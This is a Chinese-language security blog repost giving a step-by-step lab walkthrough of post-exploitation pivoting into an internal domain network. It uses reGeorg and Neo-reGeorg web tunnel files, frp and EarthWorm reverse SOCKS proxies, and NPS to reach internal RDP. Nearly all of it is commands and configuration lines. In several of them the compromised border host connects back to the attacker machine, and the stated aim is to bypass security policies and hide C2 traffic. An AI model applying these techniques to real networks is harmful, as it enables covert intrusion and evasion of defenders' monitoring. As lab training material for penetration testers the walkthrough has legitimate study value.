内网穿透隐秘隧道搭建

admin 2021年12月31日08:27:57评论201 views字数 4068阅读13分33秒阅读模式

请点击上面 内网穿透隐秘隧道搭建 一键关注!

内容来源:先知社区

内网穿透隐秘隧道搭建


0x00 前言

构建内网隐蔽通道,从而突破各种安全策略限制,实现对目标服务器的完美控制。
当我们从外网成功获得攻击点的时候,通过反弹shell、端口转发、内网穿透等技巧,来进一步入侵内网服务器。当我们取得内网目标服务器的控制权限,通过隧道技术绕过网络限制,实现隐蔽C2服务器的通信。

网络拓扑:

内网穿透隐秘隧道搭建


网络配置IP如下:

攻击机:
win10:192.168.1.6
kali:192.168.1.7

靶场:
VM1:对外边界服务器,win7
192.168.52.143
192.168.1.5

VM2:域成员,2003
192.168.52.141

VM3:域控,2008
192.168.52.138


0x01 reGeorge

1.1 环境

攻击机kali
reGeorge软件,下载:https://github.com/sensepost/reGeorg
运行程序需要的环境:
Python、pip、urllib3;

1.2 部署配置

上传tunnel.nosocket.php
前提条件,已获得跳板机的权限(都打到内网了,跳板机的权限肯定获得了),server-bt系统的跳板机是php环境,将reGeorge中的tunnel.nosocket.php上传至网站

内网穿透隐秘隧道搭建


并访问http://192.168.1.5/tunnel.nosocket.php
访问成功

内网穿透隐秘隧道搭建

启动reGeorg
python reGeorgSocksProxy.py -p 1090 -u http://192.168.1.5/tunnel.nosocket.php
表示本地1090端口的流量都转发给指定的那个url,1090是指定的监听端口;

内网穿透隐秘隧道搭建


配置代理
然后配置proxychains代理链的配置文件vim /etc/proxychains.conf,将代理设置成本机的1090端口:socks5 127.0.0.1 1090

内网穿透隐秘隧道搭建

1.3 测试

命令前面加上proxychains 运行命令,(跳板机php环境已启动,存在主页index.php)
proxychains curl http://192.168.52.143

内网穿透隐秘隧道搭建

reGeorg控制端

内网穿透隐秘隧道搭建


0x02 Neo-reGeorg

1.1 使用

设置密码并生成隧道文件,运行后会生成一个neoreg_server目录,里面包含了各种语言类型的隧道文件

$ python3 neoreg.py generate -k <password>
[+] Create neoreg server files:
    => neoreg_server/key.txt. # 密码
    => neoreg_server/tunnel.nosocket.php
    => neoreg_server/tunnel.js
    => neoreg_server/tunnel.php
    => neoreg_server/tunnel.ashx
    => neoreg_server/tunnel.aspx
    => neoreg_server/tunnel.tomcat.5.jsp
    => neoreg_server/tunnel.tomcat.5.jspx
    => neoreg_server/tunnel.jsp
    => neoreg_server/tunnel.jspx


python3 neoreg.py generate -k jdxyxd

内网穿透隐秘隧道搭建


1.2 部署配置

上传tunnel.php
前提条件,已获得跳板机的权限(都打到内网了,跳板机的权限肯定获得了),server-bt系统的跳板机是php环境,将reGeorge中的tunnel.php上传至网站

内网穿透隐秘隧道搭建

并访问http://192.168.1.5/tunnel.php
访问成功

内网穿透隐秘隧道搭建

启动Neo-reGeorg
python3 neoreg.py -k jdxyxd -u http://192.168.1.5/tunnel.php #表示本地1080端口的流量都转发给指定的那个url,1080是指定的监听端口;

内网穿透隐秘隧道搭建


配置代理
然后配置proxychains代理链的配置文件vim /etc/proxychains.conf,将代理设置成本机的1080端口:socks5 127.0.0.1 1080

内网穿透隐秘隧道搭建

1.3 测试

命令前面加上proxychains 运行命令,(跳板机php环境已启动,存在主页index.php)
proxychains curl http://192.168.52.143

内网穿透隐秘隧道搭建


0x03 frp

软件:frp_0.33.0_windows_amd64 ,frp_0.34.1_linux_amd64
代理工具Proxifier(windows下通常用可视化的proxifier、SocksCap64,Linux在proxychains设置)

1.1 攻击机为windows环境

frp的Socks5反向代理:
(HTTP反向代理修改plugin模块和proxifier代理类型即可)
攻击机-服务端:
设置frps.ini

[common] 
bind_port = 7000


内网穿透隐秘隧道搭建

然后运行
frps.exe -c frps.ini

内网穿透隐秘隧道搭建

跳板机-客户端:server_addr为攻击机IP
设置frpc.ini

[common] 
server_addr = 192.168.1.6
server_port = 7000 

[socks5]
type = tcp
remote_port = 8010 
plugin = socks5


内网穿透隐秘隧道搭建

然后运行
frpc.exe -c frpc.ini

内网穿透隐秘隧道搭建

SwitchyOmega配置

内网穿透隐秘隧道搭建

浏览器访问192.168.52.143 访问成功

内网穿透隐秘隧道搭建

proxifier配置

内网穿透隐秘隧道搭建

浏览器访问192.168.52.143 访问成功

内网穿透隐秘隧道搭建


0x04 ew

1.1 攻击机为kali环境

ew正向代理
1.正向连接跳板机在win7机器上执行(ew_for_windows上传到跳板机)
ew_for_win_32.exe -s ssocksd -l 1090

内网穿透隐秘隧道搭建

这里还需要修改proxychains.conf配置文件
$ vim /etc/proxychains.conf  socks5  192.168.1.5 1090

内网穿透隐秘隧道搭建

测试执行:
proxychains curl http://192.168.52.143/

内网穿透隐秘隧道搭建


ew反向代理

服务端-攻击机kali
执行:
./ew_for_linux -s rcsocks -l 1080 -e 1024

内网穿透隐秘隧道搭建

客户端-跳板机
执行
ew.exe -s rssocks -d 192.168.1.7 -e 1024

内网穿透隐秘隧道搭建

配置proxychains代理链
在配置文件/etc/proxychains.conf,
将代理设置成本机的1080端口(root用户修改):

内网穿透隐秘隧道搭建

测试执行:
proxychains curl http://192.168.52.143/

内网穿透隐秘隧道搭建


0x05 NPS隐秘隧道搭建

1)建立连接

此场景攻击机使用Kali,在攻击机运行命令“./nps install”安装服务端,如图7-81所示。

内网穿透隐秘隧道搭建


运行命令“nps start”启动服务端,如图7-82所示。

内网穿透隐秘隧道搭建

通过8080端口访问服务端的Web界面,如图所示。
http://192.168.1.7:8080

内网穿透隐秘隧道搭建

输入默认用户名、密码admin、123登录,登录后可以看到默认客户端连接端口为8024,登录后的Web界面如图所示。

内网穿透隐秘隧道搭建

添加客户端,如图所示,配置唯一验证密钥,验证密钥在从客户端连接到服务端时使用,此处配置为“any”,然后开启压缩和加密传输。

内网穿透隐秘隧道搭建


最后在边界主机运行命令“npc.exe  -server=192.168.1.7:8024 -vkey=any”来连接服务端,建立连接如图所示。

内网穿透隐秘隧道搭建

连接成功后在攻击机的Web界面可看到客户端上线,如图所示。

内网穿透隐秘隧道搭建

2)TCP隧道

客户端上线后便可以通过Web界面单击上线的客户端、查看选项、配置隧道,例如,若想访问内网主机的3389端口,则可通过TCP隧道将内网主机的3389端口映射到攻击机的1111端口,单击“新增”,配置目标“192.168.52.143:3389”,配置服务端口为“1111”,TCP隧道如图所示。

内网穿透隐秘隧道搭建

TCP隧道建立成功后,即可通过连接攻击机的1111端口来连接内网主机的远程桌面,在攻击机运行命令“rdesktop 192.168.1.7:1111”连接本地的1111端口,隧道的使用如图所示。

内网穿透隐秘隧道搭建


3)SOCKS5代理

若想搭建HTTP代理或SOCKS代理,只需选择对应模式,填写服务端端口即可,以SOCKS为例,选择模式为“SOCKS代理”,如图所示,服务端端口为“1234”。

内网穿透隐秘隧道搭建

配置好SOCKS代理后,便可使用攻击机192.168.1.7的1234端口访问内网,配置代理服务器

内网穿透隐秘隧道搭建

访问内网主机站点http://192.168.52.143/
使用代理如图所示。

内网穿透隐秘隧道搭建

或者配置proxifier

内网穿透隐秘隧道搭建

访问内网主机站点http://192.168.52.143/

内网穿透隐秘隧道搭建

内网穿透隐秘隧道搭建
「天億网络安全」 知识星球 一个网络安全学习的星球!星球主要分享、整理、原创编辑等网络安全相关学习资料,一个真实有料的网络安全学习平台,大家共同学习、共同进步!

知识星球定价:199元/年,(服务时间为一年,自加入日期顺延一年)。

如何加入:扫描下方二维码,扫码付费即可加入。

加入知识星球的同学,请加我微信,拉您进VIP交流群!

内网穿透隐秘隧道搭建

朋友都在看

▶️等保2.0丨2021 必须了解的40个问题

▶️等保2.0 三级 拓扑图+设备套餐+详解

▶️等保2.0 二级 拓扑图+设备套餐+详解

▶️等保2.0 测评  二级系统和三级系统多长时间测评一次?

▶️等保2.0系列安全计算环境之数据完整性、保密性测评

▶️等保医疗|全国二级、三乙、三甲医院信息系统安全防护设备汇总

▶️国务院:不符合网络安全要求的政务信息系统未来将不给经费

▶️等级保护、风险评估和安全测评三者的区别

▶️分保、等保、关保、密码应用对比详解

▶️汇总 | 2020年发布的最重要网络安全标准(下载)

天億网络安全

【欢迎收藏分享到朋友圈,让更多朋友了解网络安全,分享也是一种美德!】

内网穿透隐秘隧道搭建

↑↑↑长按图片识别二维码关註↑↑↑


欢迎扫描关注【天億网络安全】公众号,及时了解更多网络安全知识

本文始发于微信公众号(天億网络安全):内网穿透隐秘隧道搭建

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年12月31日08:27:57
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   内网穿透隐秘隧道搭建http://cn-sec.com/archives/538890.html

发表评论

匿名网友 填写信息